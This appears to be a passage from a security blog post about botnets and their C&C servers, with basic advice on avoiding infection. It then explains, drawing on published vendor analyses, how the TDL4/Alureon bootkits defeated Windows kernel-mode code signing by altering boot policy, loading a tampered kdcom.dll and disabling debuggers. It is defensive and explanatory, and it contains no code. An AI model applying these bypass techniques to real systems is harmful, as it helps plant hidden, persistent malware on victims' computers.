As I mentioned, all the bots are centralized and controlled by the C&C Server. Because of this centralized coordination, to take down such a robot network the source must be identified and caught. The reality is that such a bot master would always be very careful and would probably only log into the C&C Server if the connection is fully secured; of course, nothing is more guaranteed than a multi-layered network called TOR.

The TOR network allows the bot master to be anonymous: it removes all traces of his or her identity, with the result that the bot master is untraceable.

How to avoid your computer becoming a zombie?

The answer is simple: back to basics! Do not download software from untrusted sources; even if the software is free you must make sure that you are getting it from a trusted source. As for downloading torrents of movies, music, or video games, I would recommend you do not do it, as the potential for those items to be infected is very high.

E-mails advertising things that are too good to be true: DO NOT OPEN them, period.

Your computer should not remember your username and password(s) either. Also, in case you buy a new laptop or desktop computer, you must change the passwords. Furthermore, just be careful and reasonable with the information presented to you. For example, if you are told you have won 1 million dollars and all you have to do is click on the link to claim it, but you didn’t even play anywhere, how would you win anything, right!? So again, do not click on anything that you are unsure of, especially weird programs that would supposedly help you achieve things like hacking into someone’s Facebook account and things like that.

You must (PURCHASE, NOT CRACK) an antivirus and update it regularly; second, you should install a firewall, even if it’s virtual it still helps you identify if you are affected. Next to that, you must always run the latest operating system, especially if you have Windows. Normally they ship upgrades because they have found a vulnerability in the previous operating system, therefore the upgrade is required to patch those vulnerabilities.

How can a rootkit bypass the Windows 7 operating system’s kernel-mode code signing policy?

Microsoft has introduced a number of security features designed to prevent malicious code from running. But attackers are continually finding ways around those protections; an example is a rootkit that can bypass the Windows driver-signing protection. The functionality is contained in the TDL4, TDSS and Alureon rootkits:

TDSS has been causing serious trouble for users for more than two years, and is an example of a particularly pernicious type of rootkit that infects the master boot record of a PC.

This type of malware is often referred to as a bootkit and can be extremely difficult to remove once it’s detected. The older versions of TDSS (TDL1, TDL2 and TDL3) are detected by most antimalware suites now, but it’s TDL4 that’s the most problematic.


TDL4 has a specific function that is designed to bypass a protection in Windows 7 and Windows Vista that requires kernel-level code loaded onto a machine to be signed. The Windows kernel-mode code signing policy is mainly applicable on 64-bit machines.

“Starting with Windows Vista, kernel-mode code signing enforcement is implemented by a component known as Code Integrity. Code Integrity is a feature that improves the security of the operating system by verifying the integrity of a file every time that the image of the file is loaded into memory. The function of Code Integrity is to detect if an unsigned driver is being loaded into kernel-mode, or if a system binary file has been modified by malicious code that may have been run by an administrator,” Microsoft says in its explanation of the functionality.

The TDL4 rootkit has implemented a feature that evades this protection by changing the boot process on protected machines, according to an analysis of TDL4 by Sunbelt Software. The rootkit accomplishes this by going in and modifying which programs Windows will allow to load an unsigned driver.

“The boot option is changed in memory from the code executed by the infected MBR. The boot option configures the value of a config setting named ‘LoadIntegrityCheckPolicy’ that determines the level of validation on boot programs. The rootkit changes this config setting value to a low level of validation that effectively allows loading of an unsigned malicious rootkit dll file. The rootkit dll is kdcom.dll, which is an infected version of the normal kdcom.dll that ships with Windows,” Sunbelt’s Chandra Prakash wrote in the TDL4 analysis.

“The rootkit also disables debuggers by NOP’ing debugger activation functions as described below. This makes reverse engineering this rootkit very difficult! The KdDebuggerInitialize1 function in the infected kdcom.dll, called during normal execution of the system, installs the rootkit, which hooks the IRP dispatch functions of the miniport driver below the disk to hide its malicious MBR.”

Joe Johnson of Microsoft presented a talk about Alureon at the Virus Bulletin conference, and discussed the low-level capabilities of the rootkit. The presentation addresses the rootkit’s ability to get the Windows kernel to load a fake version of the legitimate kdcom.dll, but says that the malware does not actually bypass Kernel Patch Protection. In fact, it doesn’t have to because KPP doesn’t inspect all loaded drivers, only the code used by the kernel. Alureon patches the Windows Boot Configuration Data to make the machine think that what’s loading is Windows PE, rather than a normal version of Windows, which prevents code integrity checks from being performed.

Earlier versions of the TDL/TDSS rootkit were used in affiliate marketing programs and black hat SEO campaigns, were also part of botnets, and had specific functionality designed to hide other malware programs. An analysis of the first three versions of TDL/TDSS by Kaspersky Lab researchers showed that the rootkit is not only quite advanced, but is under continuous development and refinement by a motivated, talented crew.

“Given that the cybercriminals have put considerable effort into continuing to support this malware, fixing errors, and inventing various techniques for bypassing signature-based, heuristic and proactive detection, TDSS is capable of penetrating a computer even if an antivirus solution is installed and running. The fact that bot communication with the C&C is encrypted makes it significantly more difficult to analyze network packets. An extremely powerful rootkit component hides both the most important malware components, and the fact that the computer has been infected. The victim machine becomes part of a botnet, and will have other malware installed to it. The cybercriminals profit by selling small botnets and using blackhat SEO,” Sergey Golovanov and Vyacheslav Rusakov wrote. “As long as a malicious program is profitable, cybercriminals will continue to support and develop it.”